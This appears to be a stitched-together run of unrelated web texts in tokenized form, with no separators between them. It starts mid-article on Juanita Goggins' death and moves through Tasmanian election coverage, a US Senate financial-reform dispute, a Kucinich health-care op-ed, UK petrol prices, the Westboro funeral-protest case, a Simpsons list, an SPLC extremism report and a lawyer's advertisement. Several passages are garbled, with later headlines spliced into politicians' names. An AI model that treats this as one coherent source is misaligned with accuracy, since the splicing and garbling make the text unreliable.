Her occasional walks through the neighborhood stopped after she was mugged in 2009 , the same year the state government renamed a stretch of highway in her honor .
Linda Marshall , who managed Goggins ’ property , told the press that “ [ Goggins ] needed someone to assist her , but anyone who tried to get close , she ’d block them off .
She was very fragile .
This was something I always dreaded . ”
The death of Juanita Goggins reveals a number of things about life in the US .
Above all , her death is a direct result of the lack of sufficient health care for the elderly and the subordination of basic human necessities such as light , heat and water to the profit interests of private companies .
Care for the elderly is considered a matter of individual responsibility in the US , with working class families already shouldered with enormous burdens expected to take on the full - time care of their loved ones .
Those without families to help them are left to their own devices .
The death of an elderly person such as Juanita Goggins , left alone in her home and exposed to the elements , is not , tragically , an isolated incident but an all too common occurrence in the United States .
The shutting off of utilities to those who can no longer afford them during the middle of winter is also a regular occurrence in the US and has led to numerous deaths from exposure to sub - zero temperatures or deadly house fires such as those that have occurred in Detroit , Michigan , this year .
Workers attempting to survive without basic utilities by heating their homes with space heaters or using candles for light often pay with their lives .
The burden thrust onto the working class by the economic crisis has only made access to utilities and the fulfillment of the most basic needs all the more impossible for millions of people .
In 2009 , more than 8.2 million households in the US required financial assistance for utilities through the Low - Income Home Energy Assistance Program .
One in eight Americans currently requires emergency food assistance because they are unable to get enough to eat .
Millions report having to decide between paying for food , medications or utilities .
As the living standards of the working class are coming more and more under attack , the lives of the most vulnerable members of society , including children , the elderly , and the mentally ill are placed in enormous danger .
Tasmania 's Opposition Leader Will Hodgman says he expects to be given the opportunity to govern .
Addressing a packed tally room in Hobart , Mr Hodgman said his party looked like capturing the highest percentage of the primary vote .
" [ It is ] the Liberal Party that has won the most votes right across Tasmania , " he said .
" Tasmanians have sent a very clear message tonight and it is one for change .
" It is one for a brighter , positive future .
I will ensure that we will work constructively , positively and with their interests at our heart . "
With more than 80 per cent of the vote counted , the results point to a hung Parliament as predicted .
Labor has lost four seats and the swing against the Government near the end of the first round of counting is about 12 per cent .
The likely result is Labor 10 , the Liberals 10 and the Greens 5 in the 25 seat House of Assembly .
Mr Hodgman topped the poll in Franklin and has the highest vote in the state .
Greens leader Nick McKim told the tally room a hung Parliament is an opportunity for a new era of co-operative politics in Tasmania .
He described it as a historic result for his party and the Greens ' best ever election achievement in any Australian state or territory .
" What an opportunity this is for Tasmania , what an opportunity for a new era of constructive , co-operative politics , for politicians to work together not to advance their own interests or their party 's , but to advance Tasmania , " he said .
" The Tasmanian people have moved past that tired old view . "
Premier David Bartlett was the last of the leaders to speak .
He congratulated Mr Hodgman and Mr McKim and praised their campaigns .
He says he accepts responsibility for Labor 's performance .
" The electorate has sent Labor a message , " he said .
The undecided seats are in Denison in the south and Braddon , in the north - west .
In Denison , it is a contest between the Greens ' Helen Burnett , Liberal Richard Lowrie and the Independent outsider Andrew Wilkie .
With 84 per cent of the primary vote counted , the Premier David Bartlett and Scott Bacon , Liberal Matthew Groom and the Greens ' Cassy O'Connor have all been elected .
The last seat in Braddon will be won by either the incumbent Liberal MP Brett Whiteley or the Greens ' Paul O'Halloran .
Labor 's Bryan Green and Brenton Best have been returned , along with the Liberal deputy leader Jeremy Rockliff .
Senate GOP Leader Mitch McConnell Addison ( Mitch ) Mitchell McConnellGOP senators pan debate : ' S - -- show , ' ' awful , ' ' embarrassment '
' One more serious try ' on COVID - 19 relief yields progress but no deal The Hill 's Campaign Report : Debate fallout l Trump clarifies remarks on Proud Boys l Down to the wire in South Carolina MORE ( Ky. ) exited a White House meeting on the issue Wednesday and charged that the White House had ordered Democratic senators to pull out of bipartisan talks on an issue on which Democrats believe they have the advantage .
“ They wanted to jam us , ” said McConnell , whose message to Obama was to allow negotiators back to the table .
“ I naively thought we were heading in that direction until the strings were pulled on the Democratic leaders , ” McConnell said .
ADVERTISEMENT
White House Press Secretary Robert Gibbs quickly fired back , saying Obama had invited Republicans to join in reform efforts .
But Gibbs then warned Obama “ would not accept bad policy in pursuit of bipartisanship , ” and also suggested Republicans were looking for loopholes for large banks and other financial interests .
Obama has “ made clear that bipartisanship should not be equated with an openness to lobbyist loopholes and special interest carve - outs , and that he would be unwilling to negotiate on some key issues , ” Gibbs said .
Senate Majority Leader Harry Reid Harry Mason ReidMeeting Trump Supreme
Court pick a bridge too far for some Democrats GOP senators confident Trump pick to be confirmed by November Durbin : Democrats can ' slow ' Supreme Court confirmation ' perhaps a matter of hours , maybe days at most ' MORE ( D - Nev. ) also fired a shot at McConnell , saying a lock - out of Republicans was “ a figment of his imagination . ”
Reid said Republicans have tried to obstruct almost every piece of legislation Obama and Democrats have pushed for , and that financial reforms are no different .
“ It 's obvious that the Republicans are saying ' no ' again to progress for America , ” Reid said .
The financial overhaul bill was approved by the Senate Banking Committee last month on a party - line vote after Chairman Chris Dodd ( D - Conn . ) ended negotiations with Sen. Bob Corker Robert ( Bob ) Phillips CorkerHas Congress captured Russia policy ?
Tennessee primary battle turns nasty for Republicans Cheney clashes with Trump MORE ( R - Tenn . ) .
Earlier talks between Dodd and Sen. Richard Shelby ( R - Ala . ) had also failed to reach a compromise .
Reid said the Senate would push ahead with the bill in its current form " as rapidly as possible , " and he invited Republicans to help improve the bill .
" It 's important the American people realize it 's difficult to work with the Party of No , " Reid said .
Republicans have acknowledged that opposing financial regulatory reform puts them in a difficult position , and some GOP senators have predicted legislation will be approved by the Senate .
But the GOP has also stepped up its arguments this week against the bill , which they say would set up a fund for permanent bailouts of the financial sector that would have taxpayers subsidize irresponsible behavior by Wall Street .
On Wednesday , there were new signs that Democrats might have trouble winning the 60 votes they 'll need to clear procedural hurdles before a final Senate vote .
Sen. Scott Brown ( R - Mass . ) , who has voted with Democrats since arriving in the Senate earlier this year to move an extension of unemployment benefits forward , criticized the White House for using regulatory reform as a wedge issue .
He said he could n't support the bill as written .
Dodd , however , said he did n't think all 41 Senate Republicans would vote against his bill on the floor .
" I do n't think a number of Republicans want to be led by the nose into the pit , " Dodd said .
The White House and Obama , who appear to be relishing a fight on the issue , told reporters the bill would prevent bailouts , not lead to them .
“ That 's the goal , ” Obama said .
The two sides are fighting over a provision in the bill that would create a $ 50 billion industry - supported fund to help financial firms whose collapse would be detrimental to the economy .
Republicans argue the fund is insufficient and that taxpayers would be asked to step in if the fund did n’t cover the costs of a future financial crisis .
Before the meeting , Obama warned that the overhaul needed to be passed to prevent another financial “ meltdown . ”
“ All of us recognize that we cannot have a circumstance in which a meltdown in the financial sector once again puts the entire economy in peril , ” Obama said .
“ And that if there ’s one lesson that we ’ve learned it ’s that an unfettered market where people are taking huge risks and expecting taxpayers to bail them out when things go sour is simply not acceptable . ’’
Obama has said he wants to be able to sign the bill into law before the two - year anniversary of the peak of the financial crisis in early fall .
The House has already passed a bill , and the Senate is expected to move quickly now that the Easter recess is over .
Treasury Secretary Timothy Geithner will join Gibbs at the daily briefing Wednesday afternoon , the White House said .
Joining the president in the Cabinet Room for the meeting on financial regulatory reform were Geithner , Vice President Joe Biden Joe BidenPrivacy , civil rights groups demand transparency from Amazon on election data breaches Facebook takes down Trump campaign ads tying refugees to coronavirus Trump crowd chants ' lock her up ' about Omar as president warns of refugees in Minnesota MORE , House Majority Leader Steny Hoyer ( D - Md. ) , Minority Leader John Boehner John Andrew BoehnerLongtime House parliamentarian to step down
Five things we learned from this year 's primaries Bad blood between Pelosi , Meadows complicates coronavirus talks MORE ( R - Ohio ) and Speaker Nancy Pelosi ( D - Calif . ) .
Reid , the Senate majority leader , and McConnell , the minority leader , were also there , joined by Obama 's top aides .
This story was posted at 11:38 a.m. and updated at 1:46 p.m .
Dennis Kucinich / U.S. Representative
President Barack Obama is in northern Ohio on Monday to campaign for his health care plan , and I will be here to welcome him .
I have met with the president three times to discuss how we can work together to address the serious deficiencies in our health care system .
Even at this late date , I am hopeful that the White House will be able to reinstate key reforms that passed the Education and Labor Committee on which I serve .
Unfortunately , the president 's plan , as it currently stands , leaves patients financially vulnerable to insurance companies .
It requires all Americans to buy private health insurance policies , while failing to ensure those policies do what they are supposed to do -- protect people from financial catastrophe caused by injury or illness .
Comprehensive health insurance is a matter of economic security .
While many Americans do n't have health insurance at all , many more Americans have health insurance that does n't pay for care when they get sick or injured .
When that happens , illness can lead to economic ruin .
Half the personal bankruptcies in America occur because health insurance companies refuse to pay medical bills .
Unfortunately , if the president 's plan becomes law without substantive change , you would still be only a major illness or injury away from personal bankruptcy , except the federal government will have required you to buy a private health insurance policy .
Over the years , I have held many town hall meetings in the 10th District on health care .
I am the co-author of H.R. 676 , a bill that would improve Medicare and extend its coverage to those under age 65 .
This past year , as reform legislation began to take shape , I led a group of members of Congress to create a set of policies that clarified elements of a suitable compromise .
I joined a majority of the 77 members of the Congressional Progressive Caucus who promised to oppose any legislation that did not include a public option .
When a bill was considered in the Committee on Education and Labor last summer , I worked hard to improve it .
I won five separate amendments , each of which improved the bill significantly .
A key improvement was my amendment to allow states to implement a single - payer plan , the only model proven to control costs while covering everyone .
The amendment waived the application of the Employee Retirement Income Security
Act for any state that signs into law a single - payer health care plan .
My budget - neutral amendment was passed by a bipartisan vote of 27 - 19 .
The promise of single - payer health care reform in the states constituted a safety net , if the underlying bill otherwise failed to control costs .
I voted for this version of the health care bill , and it passed in committee .
It was a compromise , but a reasonable one .
However , the version of the bill that reached the House floor was considerably watered down .
It had a severely weakened public option and the employee - retirement waiver had been stripped .
It no longer constituted an incremental step forward that would provide relief to my constituents , so I could not support it .
The version of the bill that passed the Senate was even worse .
Absent a strong public option or legal protection for states that wish to pursue single payer , the bill that the president is proposing is a step in the wrong direction .
Even with the few modest improvements in the bill , the insurance companies will still have dozens of loopholes to deny care and continue to find ways to leave Americans with the unpayable bill .
Kucinich , a Democrat , represents Ohio Congressional District 10 .
Please turn on JavaScript .
Media requires JavaScript to play .
The average price of unleaded petrol has hit a new high of 119.9 p a litre , analysts Experian Catalist have said .
Prices have been increasing steadily since the end of last year as the pound has weakened , which makes imported fuel more expensive .
The previous record was 119.7 p , reached in July 2008 when the price of oil peaked at $ 147 a barrel .
Rising wholesale prices have also added to the price , as well as a 1 p rise in fuel duty which took effect on 1 April .
A further 1 p rise in duty is due in October and an increase of 0.76 p is set for January 2011 .
Varying prices
We can only hope that the 6 May election produces a result that strengthens the pound and puts downward pressure on pump prices
Paul Watters , AA
Why are petrol prices rising ?
Your stories : Driven to despair
" This is a dark day for motorists , " said RAC motoring strategist Adrian Tink .
" Petrol prices have been rising steadily over the past year and have now reached the inevitable record high .
" However , this is only the average .
In some areas , motorists will be paying close to £ 6 a gallon ( 131.9 p a litre ) . "
According to price comparison site petrolprices.com , the most expensive petrol station in the country is on the M1 motorway in Buckinghamshire , which is charging 130.9 p a litre .
The cheapest are two stations in Yorkshire , which are charging 114.9 p a litre .
The average price of diesel is currently 120.65 p a litre , according to Experian Catalist , still well below the record average of 133.25 p , also set in July 2008 .
Weak pound Brendan McLoughlin at petrolprices.com says the fall in the value of sterling is the main reason behind the rise .
" We have seen fuel duty rises too , but the impact of the exchange rate has been the single largest cause of rising pump prices lately . "
The pound has fallen by about 15 cents against the dollar in the past few months .
In November , it was trading at $ 1.67 .
It is currently trading at $ 1.52 .
Another reason for the rising price on the forecourt is increased refining costs , which have pushed up the wholesale price of petrol .
This , together with currency movements , helps to explain the record petrol price despite the fact that oil currently costs about $ 85 a barrel , well below the $ 147 a barrel it cost when petrol prices were last this high .
The best hope for a fall in the price of petrol , according to the AA , is for the pound to strengthen .
" We can only hope that the 6 May election produces a result that strengthens the pound and puts downward pressure on pump prices , " said the motoring group 's Paul Watters .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The Following 559 Users Say Thank You to Stskeeps For This Useful Post :
Washington ( CNN ) --
A small Kansas church that has gained nationwide attention for protesting loudly at funerals of U.S. service members will receive a Supreme Court hearing over free speech rights .
The justices Monday accepted an appeal from the father of a U.S. Marine killed in Iraq over efforts to keep members of the Topeka - based Westboro Baptist Church from demonstrating near memorial services and burials .
The Marine 's family won a $ 5 million judgment from the protesters , which lower courts overturned .
The church , led by pastor Fred Phelps , said it believes God is punishing the United States for " the sin of homosexuality " through events such as soldiers ' deaths .
Members have traveled the country , shouting at grieving family members at funerals and displaying such signs as " Thank God for Dead Soldiers " and " God Blew Up the Troops . "
At issue is a balancing test between the privacy rights of grieving families and the free speech rights of demonstrators , however disturbing and provocative their message .
Several states have attempted to impose specific limits on when and where the church can protest .
Westboro members appeared outside the 2006 funeral for Lance Cpl. Matthew Snyder in Westminster , Maryland , outside Baltimore .
A jury awarded Snyder 's family $ 2.9 million in compensatory damages plus $ 8 million in punitive damages .
Those damages later were reduced to $ 5 million .
It was the first lawsuit against the church over the protests .
Snyder 's father , Albert , testified his son was not gay , but church members said their broader message was aimed at the unspecified actions of the military and those who serve in it .
iReport : Westboro Baptist Church protest
The Supreme Court has never addressed the specific issues of laws designed to protect the " sanctity and dignity of memorial and funeral services " as well as the privacy of family and friends of the deceased .
But the high court has recognized the state 's interest in protecting those from unwanted protests or communications while in their homes .
The justices will be asked to address how far states and private entities such as cemeteries and churches can go to justify picket - free zones and the use of " floating buffers " to silence or restrict speech or movements of demonstrators exercising their constitutional rights in a funeral setting .
According to a legal brief it filed with the high court , church members believe it is their duty to protest at certain events , including funerals , to promote their religious message : " That God 's promise of love and heaven for those who obey him in this life is counterbalanced by God 's wrath and hell for those who do not obey him . "
The congregation is made up mostly of Phelps and his family .
The pastor has 13 children and at least 54 grandchildren and seven great - grandchildren .
He described himself as an " old - time " gospel preacher in a CNN interview in 2006 , saying , " You ca n't preach the Bible without preaching the hatred of God . "
Church members have participated in hundreds of protests across the country .
In a separate appeal , the high court last year blocked Missouri 's effort to enforce a specific law aimed at the Westboro church .
Phelps , his daughter Shirley Phelps - Roper and other church members protested near the August 2005 funeral of an Army soldier in St. Joseph , Missouri .
State lawmakers later passed the Spc. Edward Lee Myers Law , criminalizing picketing " in front or about " a funeral location or procession .
A while ago , Cracked did a list focusing on underrated Simpsons Characters .
Now , generally I have nothing against Cracked , in fact I often laugh heartily at much of its content , but when a huge Simpson fan such as I ( one who has primarily enjoyed and / or thoroughly enjoyed even the lamer , lesser seasons and really dug the movie ) read the list they so thoughtlessly posted , I was disappointed and a bit sad .
Their list really was crappy , and much of the comments reflect such distaste .
So , being a list writer myself , I figured why not one - up the Cracked fellows and see if the choices I made are read any better .
So , without further stalling and pointless explanation …
10 Lunch Lady Doris
Quotes : Lunch Lady Doris : “ More testicles mean more iron . ” Lunch Lady Doris : “ There ’s very little meat in these gym mats ” .
History : Originally voiced by Doris Grau ( she passed in 1995 ) , Lunch Lady Doris is your standard mocking look at everything a school cafeteria worker is : laconic , monotonous , and perpetually accepting food ingredients that are far sub-par .
Though used sparingly and just a background for many years , she resurfaced in the 18th season voiced anew by the amazing Tress MacNeille .
9 Eddie the Cop
Quotes : Eddie : ‘ He ’s right , Chief . ’
History : Edward “ Eddie ” Edison is one of the two cops who aids Chief Wiggum on every mission .
Unlike Lou he is unintellegent but not as dumb as Wiggum .
He is voiced by Harry Shearer .
As a background character , Eddie is complimentary and , though seemingly useless , would throw off the cosmic balance of the Police trifecta and would likely toss the universe out of whack .
8 Maggie Simpson
Quotes : * sucking noises *
History : Though frequently overlooked by Homer even going so far as to be called ‘ Other Lisa ’ or , when reminded of his third child as Margaret and honestly not having any clue as to who she is , Maggie has made quite an impression on the Simpson family .
She has , albeit incomprehensibly , shot Mr. Burns and has managed to rescue the family a time or two ( see : The Movie ) and rounds out the family quite nicely , even if she is the daughter of Kang .
7 Ralph Wiggum
Quotes : Ralph : ‘ Hi , Super Nintendo Chalmers ! ’
Homer : ‘ There ’s your giraffe , little girl . ’
Ralph Wiggum : ‘ I ’m a boy . ’
Homer : ‘ That ’s the spirit .
Never give up . ’
Ralph : ‘ Me fail English ?
That ’s unpossible . ’
Ralph : [ whispering ]
‘ Lisa , what ’s the answer to number seven ? ’
Lisa : [ whispering ]
‘ Sorry , Ralph .
That would defeat the purpose of testing as a means of student evaluation . ’
Ralph : [ pauses ]
‘ My cat ’s name is Mittens ’ Bart Simpson ( spelling “ Impervious ” in a spelling B ) : ‘ I… M…P … ’
Nelson : ‘ Bart is pee ! ’
Ralph Wiggum : ‘ I made Bart in my pants ! ’
Ralph : ( To a wolf ) : ‘ Will you be my mommy ?
You smell like dead bunnies …’
Ralph : ‘ That ’s my swingset , and that ’s my sandbox .
I ’m not allowed to go in the deep end .
And this is where I met the leprechaun . ’
Bart : ‘ Right , the leprechaun . ’
Ralph : ‘ He told me to burn things . ’
Ralph : ‘ My cat ’s breath smells like cat food . ’
History : Ralph is a dolt .
There really is n’t two ways about it .
His friendship with any of the more prominent characters is always tenuous at best .
When Valentines Day rolled around , Lisa felt awful that no one was giving poor Ralph any cards .
Her card , as Ralph read it aloud instantly infatuated , said : I Choo - Choo - Choose you and , ‘ There ’s a picture of a train ’ .
Ralph is innocent , perhaps further along in school that he really ought to be , and very proud of his Dad ’s Forbidden Closet of Mystery .
6 Otto Mann
Quotes : Homer : ‘ That guy has gotta go ! ’
Marge : ‘ Hmm , I know how you feel .
But he is good with the kids . ’
[ pan upward to Lisa ’s room , where Otto is telling her a bedtime story by candlelight ]
Otto :
‘ So the lady drove faster , but the strange car kept banging into her from behind … ’
[ Lisa gasps ]
Otto :
‘ So she swerved off the road into the woods , and lost the other car .
And then , she realized that the man in the other car was n’t trying to hurt her .
No , he was trying to warn her… about the ax - wielding maniac hiding in her back seat !’
Lisa Simpson : ‘ Did the maniac kill her ? ’
Otto : ‘ Natch !
And you know how I know ? ’
Lisa Simpson : ‘ How ? ’
Otto : ‘ Because … * I* was that maniac . ’
[ Lisa ’s scream shakes the whole house ]
Otto : [ hastily ]
‘ I was just kidding !’
History : Otto Mann : stoner , alcoholic , rocker … oh , and a bus ‘ driver ’ .
Otto has been the cause of or a party to each and every accident the school bus has ever been in , and there has been an awful lot .
Otto also attended Brown University , where he graduated Sigma , taught briefly and almost received tenure .
Seriously .
5 Cletus Del Roy Spuckler
Quotes : Cletus : ‘ Hey Brandine , you could wear this shirt to work . ’
Brandine : ‘ Aw Cletus , you know I gotta wear the shirt what Dairy Queen gimme . ’
Cletus : ‘ Hey Brandine , you might ka wear these to your job interview . ’
Brandine : ‘ And scuff up the topless dancing runway ?
Nah , you best bring em back where from ya got em . ’
Cletus : ‘ Ok . ’
History : Cletus was introduced during the fifth season in “ Bart Gets an Elephant ” .
He is shown as one of the “ slack - jawed yokels ” gawking at Bart ’s elephant , Stampy .
He was the go - to character for a quick laugh on the show , and is a staff favorite .
He was introduced as a character in “ 22 Short Films About Springfield ” .
The episode featured bluegrass music played on a banjo accompanied with different taglines stating the abnormal things Cletus has done including eating a skunk and losing a toe .
“ Hey ma !
Get off the dang roof ! ”
4 Disco Stu
Quotes : Disco Stu : “ Disco Stu likes disco music - the cats in Funky Business know how to move it , groove it and prove it , ya dig ? ” Disco Stu : “ If Disco Stu ever lost his mind and decided to get hitched , they ’d be the only choice baby .
So , so groovy ” .
Disco Stu : “ Did you know that disco record sales were up 400 % for the year ending 1976 ?
If these trends continue ….
Ayyy ! ” .
History :
He first appeared in the episode “ Two Bad Neighbors ” .
During a neighborhood yard sale , near the beginning of the episode , Homer and Marge search their attic for items they might sell .
Marge suggests Homer ’s old Rhinestone Nights Fashion Gun .
Homer protests , “ … I need it to rhinestone up my old clothing ! ” .
Marge then holds up Homer ’s old leather jacket complete with rhinestone lettering .
“ Who ’s Disco Stu ? ” Marge asks , referring to the words on the back .
Homer explains , “ I wanted to write ‘ Disco Stud ’ but I ran out of space .
Not that Disco Stu did n’t get his share of the action ! ” Awesome .
3 Professor John Frink
Quotes : Frink : ‘ Oh my great good God !
Gentlemen , your attention please .
I am detecting a gigiantic amphibious life - form , it ’s 80 meters long and it ’s heading this way .
Oh good glayven it ’s on my shoe .
It ’s a small frog , just get off , just get off there , just get out of it , get out of it .
Stupid machine , oh wait a minute , this is n’t the Monsterometer , it ’s the Frog - Exaggerator Mm-hai . ’
Frink : ‘ You ’ve got to listen to me .
Elementary chaos theory tells us that all robots will eventually turn against their masters and run amok in an orgy of blood and the kicking and the biting with the metal teeth and the hurting and shoving . ’
Scientist : ‘ How much time do we have professor ? ’
Frink : ‘ Well according to my calculations , the robots wo n’t go berserk for at least 24 hours . ’
( The robots go berserk . )
Frink : ‘ Oh , I forgot to er , carry the one . ’
Frink :
Ha ha wha .
‘ Oh , sorry I ’m late .
There was trouble at the lab with the running and the exploding and the crying when the monkeys stole the glasses off my head .
Wh - ha ha . ’
( The screen fades . )
Frink : ‘ Oh , no , please no .
I have a funny story if you listen .
I even wrote theme music , here listen .
Ha ha , mm-m hey hey , Professor Frink , Professor Frink , He ’ll make you laugh , he ’ll make you think ,
He likes to run , and then the thing , with the… mm-m person …
Oh boy , that monkey is going to pay . ’
Frink : ‘… and these ( handing books to Homer ) should give you the grounding you ’ll need in thermodynamics , hypermathematics and of course microcalifragalistics . ’
Homer : ‘ Er , look , I just want to know how to invent things . ’
Frink :
‘ All you have to do is think of things which people need but which do n’t exist yet . ’
Homer : ‘ You mean like an electric blanket - mobile ? ’
Frink : ‘ Www oh well , possibly .
Or you could take something that already exists and find a new use for it , like … ’
Homer : ‘ Hamburger earmuffs . ’
Frink : ‘ Mmm well , I suppose that would qualify . ’
Homer : ‘ Thanks sucker . ’
( Homer throws the books and runs off )
Frink : ‘ Weh , uh , alright just stay calm Frinky .
These babies will be in the stores while he ’s still grappling with the pickle matrix bhay - gn - flay - vn ’
History : Never fully appreciated for his extreme genius , Professor John Frink has a tendency to not only over exaggerate his inventions and creations , but also to arrive either just too late or just in time - though with a useless machine of one kind or another - to the problem at hand .
Though never fully realized as a great character , we did find out that his dad , voiced by Jerry Lewis , was just as big of a nut job as Frink is .
2 Hans Moleman
Quotes : Hans Moleman : ‘ Lesbian ?!
This is n’t my army reunion . ’
Gay man in army clothes : ‘ You ’re coming home with me . ’
Hans Moleman : ‘ Yes , Colonel . ’
Hans : ‘ Today , part four of our series of the agonizing pain in which I live every day . ’
College girl : ‘ She ’s worse than that 80 year old who pretended to be a freshman . ’
Hans Moleman : ‘ I just wanted a place to sit down … ’
History : Hans has escaped death innumerable times , usually highly improbably .
He survived his car blowing up , catching on fire due to the powerful magnifying effect of his glasses , Montgomery Burns drilling into his brain , capital punishment ( in a local jail ) after Homer eats his last meal , being buried alive , and being engulfed by the “ anti-escape bubble ” that was attempting to catch Marge ( a parody of a similar device from the 60s show the Prisoner ) .
Many times people will totally disregard him , usually leading to something like death , or simply imprisonment , but since he appears , even after “ dying ” , those later appearances could indicate he survived .
1 Groundskeeper Willy
Quotes : Willy : “ Now look boy .
If your da goes ga - ga , you just use that ‘ shin ’ of yours to call me and I ’ll come a - runnin ’ .
But do n’t be readin ’ my mind between four and five .
That ’s Willie ’s time . ”
Willy : “ Bonjourrr , you cheese eatin ’ surrender monkeys . ”
Willy : “ Hey , Wolfie , put down that Hors D’oeuvre - It ’s time for the main course ! ”
Willy : “ If elected mayor my first act will be to kill the whole lot of ya , and burn your town to cinders ! ”
Willy : “ I made millions in softwear , but lost it all at the track . ”
Willy : “ Get your haggis , right here !
Chopped heart and lungs boiled in a wee sheep ’s stomach !
Tastes as good as it sounds .
Good for what ails ya ! ”
Willy : “ Grease me up lassie ! ” Willy : “ I was wrestlin ’ wolves back when you were at your mothers teat ”
History :
It takes an extreme opposite to compete with Principal Skinner ’s milktoast , pasty demeanor , and the gruff , pissy , snarky , stereotypical angry Scott , groundskeeper Willy is precisely the guy .
Always the handyman , however always the groaning and grumbling hired help , Willy will clean the puke , re-seed the football field , and climb through the sewers to achieve his goal .
All that aside , nothing was freakier than seeing Willy as Freddy Krueger in The Treehouse of Horror .
So cool .
March 3 , 2010  --
Anti-government sentiments in the U.S. have reached levels so high they could result in another attack like the Oklahoma City bombing , according to a report released Tuesday by an organization that tracks right - wing extremists – and the authors of the report place part of the blame on Lou Dobbs , Glenn Beck , Rep. Michele Bachmann and Sarah Palin .
In a statement to ABC News , Lou Dobbs hit back at the director of the group that prepared the report , calling him " paranoid . "
A host of recent attacks on law enforcement , plots against President Obama , and a shooting at Washington , D.C. 's Holocaust museum are " signs of the times , " said Mark Potok , director of the Southern Poverty Law Center , a non-profit group that monitors militias , white supremacists , and other extremist activity .
Potok made his comments during a teleconference with reporters to promote the SPLC 's latest annual report on hate - group activity .
" We 've seen more threats and actual attacks in the past 18 months than we 've seen at any given period over the past 15 years , " claimed Potok .
Potok said he blames some public personalities and conservative politicians for inciting fear .
Potok cited talk - show host Glenn Beck for stoking fears that the Federal Emergency Management Agency is running concentration camps , former CNN host Lou Dobbs for incurring fears about supposed Mexican plots to take over the southwestern U.S. , Rep. Michele Bachmann , R - Minn. , for making statements about secret political reeducation camps , and former vice presidential candidate Sarah Palin for referring to Obama " death panels " during the health care debate .
Bachmann and Beck are also cited by name in the SPLC 's report , but Dobbs and Palin are not .
" These people help to bring completely groundless conspiracy theories from the margins into the mainstream , " said Potok .
In a phone interview , Dobbs scoffed at the report .
" It 's sad that Mr. Potok insists upon maintaining his paranoia , and I hope that he recovers . "
" Beyond that , I have nothing to say about the man , " said Dobbs .
' Another Oklahoma City Is Very Much a Possibility '
A spokesperson for Beck declined comment .
Spokespersons for Bachmann and former Alaska Governor Sarah Palin did not respond by press time to requests for comment .
Bachmann and Beck are discussed in the report itself as possible sources of anger , while Potok cited Palin and Dobbs in separate articles accompanying the report .
The latest annual SPLC report , " Rage on the Right , " claims there has been a startling rise in numbers of extremist groups , particularly in the Patriot movement and militias , the paramilitary branches of these Patriot groups .
Patriot groups see the federal government as their primary enemy and adhere to extreme antigovernment doctrines , frequently believing in groundless conspiracy theories .
According to the SPLC 's figures , the number of active Patriot groups grew from 149 to 512 , an increase of 363 groups ( 244 percent ) in 2009 , and the number of militia groups grew from 42 to 127 , an increase of 85 groups ( 200 percent ) in 2009 .
The number of nativist vigilante organizations that go beyond advocating strict immigration policy and actually confront or harass suspected immigrants grew from 173 to 309 , an increase 136 groups ( almost 80 percent ) in 2009 , the report said .
The number of hate groups based on racism , anti-Semitism and anti-gay sentiment grew from 926 to 932 in 2009 .
SPLC said this increase caps a decade in which the number of hate groups surged by 55 percent from 2000 to 2009 ( 602 groups to 932 ) .
Potok says the expansion of hate groups in 2009 would have been much greater if not for the demise of the American National Socialist Workers Party , a key neo -Nazi group whose founder , Bill White , was arrested in October 2008 .
The group had 35 chapters .
Taken together , these three radical strands -- antigovernment Patriot groups , nativist extremist groups and hate groups -- increased their numbers by approximately 40 percent in 2009 , according to Potok .
Potok said one of the main fears is that these radical groups are infiltrating mainstream groups like the Tea Party movement because of cross pollination of individuals who attend radical group meetings and more mainstream gatherings .
Potok said he thinks that the climate today matches that of the ' white hot ' tension among anti-government groups prior to the Oklahoma City bombing that killed 150 people in 1995 .
" Another Oklahoma City is very much a possibility , " said Potok .
Click Here for the Blotter Homepage .
When You ’re Accused Or Arrested For A Crime , You Need A Criminal Defense Lawyer Who Will Fight For You With an Aggressive , Creative Defense !
is a Criminal Law Specialist and the former Deputy DA for Orange County .
His experience and expertise are just two of the reasons he has such a successful track record in defending people who have been accused or arrested for a variety of criminal acts .
He understands how the prosecution works and knows exactly how to defend you , protect your rights and freedom .
Your Rights Are Important !
Your Freedom Is Important !
When it comes to hiring a winning Criminal Defense Lawyer - Experience Is Important
Our law offices are committed to ensuring all your rights are protected under the law .
Every Client Who Works With Us Receives :
Your Free Consultation is the first step you need to take to protect your freedom , family and reputation .
This is your opportunity to discover why Rudolph E Loewenstein is the criminal defense lawyer choice for you .
In all of our practice areas — DUI / DWI , drug offenses , sex offenses , homicide , assault , domestic violence , white collar crime and juvenile law — our first goal is your freedom .
Contact Us Today For Your Free Consultation
Vehicular Manslaughter :
If you 're involved in a car accident that results in a death you could be charged with vehicular manslaughter whether or not you 're accused of being under the influence of alcohol or drugs .
It can be a misdemeanor which involves you committing an infraction like running red light or sometimes mere negligence can be enough to get charged with a Penal Code Section 192 ( c ) ( 2 ) .
Or it could be you 're accused of being under the influence and someone is killed in the auto accident , a violation of 191.5 ( a ) .
The consequences of either one are serious and could result in a long period of jail time .
Domestic Violence : Family disputes that result in the police being called almost always result in someone going to jail .
It used to be the police would try to mediate the situation or remove one party from the environment until the situation calmed down .
That has changed and many times one party will regret involving the police but it becomes too late when 911 is called and the police arrive since they do n't do anything other than try to investigate if a possible crime has occurred and make an arrest .
Penal Code section 273.5 is the most common charge but there are many defenses available to someone accused of this when every situation is so different and every family dynamic is always changing .
White Collar Crimes : Sometimes crimes involving theft by employees of companies or organizations from the CEO to the soccer treasurer are called " white collar " crimes .
Anything that involves a violation of Penal Code 487 ( the theft statute ) can be called a white collar crime .
Most commonly white collar crimes involve large thefts either by embezzlement or by fraud .
A common example of a case I have handled like this is the executive of the company ( CFO ) who was accused of using company funds for his personal use like a salt water fish tank for his house , new cars , and extravagant trips abroad using money from the company .
Sex Crimes :
Anytime sex is involved in a case it takes on special significance .
Many sex crimes require sex registration upon conviction per Penal Code Section 290 .
Sex cases can range from rape , pimping and pandering , to indecent exposure .
Just because the allegations involve sex it does n't mean it is a mandatory sex registration .
Obvious cases such as child molestation come with the requirement but misdemeanor child annoyance ( Penal Code Section 647a ) does not .
If the charge is one involving sexual misconduct the prosecutor 's office will assign it to a specific unit within the District Attorney 's Office so the profile of the case is always raised , as are the potential consequences .
Internet Sex Crimes : Penal Code Section 311.11 is possession of child pornography .
This is a very common charge that can result in uncommon pain to the accused .
Mandatory sex registration , Penal Code section 290 , is required .
Oftentimes it results in publicity and loss of employment .
Even if jail or prison is n't imposed internet restrictions can be ordered so that the offender is unable to complete school work or maintain employment .
Child pornography is the intentional receipt and viewing of lewd images of children in sexually explicit positions .
It can be prosecuted in Federal Court or State Court .
